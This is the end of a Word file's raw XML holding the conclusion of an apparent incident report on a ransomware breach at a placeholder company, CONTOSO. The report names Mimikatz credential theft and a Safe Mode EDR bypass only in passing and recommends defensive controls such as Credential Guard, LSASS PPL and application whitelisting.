        <w:t xml:space="preserve">Group Policy restrictions on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> would have prevented the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F20169A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-in-depth is critical - no single security control is sufficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0FE82F" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The attacker's technique demonstrates advanced knowledge of Windows internals and security product limitations. The use of Safe Mode to bypass EDR, while not novel, shows sophistication beyond commodity ransomware operators. The rapid progression from initial access (10:47:34) to credential theft (10:48:14) to EDR bypass (10:49:42) and complete removal (10:51:20) indicates a well-rehearsed attack playbook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664B55E6" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate implementation of the recommended controls - particularly Credential Guard, LSASS PPL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> restrictions, and application whitelisting - is critical. These layered </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> would have disrupted the attack at multiple points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B37F0" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Credential Guard would have prevented credential theft, denying Domain Admin access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0DD4CB" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LSASS PPL would have blocked </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> memory access, preventing credential extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A94B16" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> restrictions would have prevented Safe Mode boot manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB24E95" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application whitelisting would have prevented masked </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D5775" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The cost of implementing these controls is minimal compared to the impact of this breach: Domain Admin compromise, 245 MB data exfiltration, 1,247 files encrypted, complete EDR removal, and full system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08911F97" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Security is not a product - it is a process. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E78"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-in-depth with multiple layered controls is the only effective strategy against sophisticated adversaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42758F8A" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="007D40BD">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33107700" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="6000"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>END OF REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B21AFC" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>This report contains confidential information proprietary to CONTOSO Corporation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C2032C" w14:textId="77777777" w:rsidR="007D40BD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Unauthorized disclosure or distribution is strictly prohibited.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007D40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0185"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="076E59F0"/>
    <w:lvl w:ilvl="0" w:tplc="E6D0622E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D8ACDC7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="26EEBECA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CAE89B34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8370F3EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6FBE4E7E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D1880C0C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7C928DFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="608C79EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1629780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0BD"/>
    <w:rsid w:val="00545AF3"/>
    <w:rsid w:val="007D40BD"/>
    <w:rsid w:val="00FB2C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06A9260"/>
  <w15:docId w15:val="{E223261A-AACD-A144-84CD-9E4A96747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8"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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40" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="5B9BD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2542</Words>
  <Characters>14492</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>120</Lines>
  <Paragraphs>33</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Macready</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-16T10:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-16T10:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>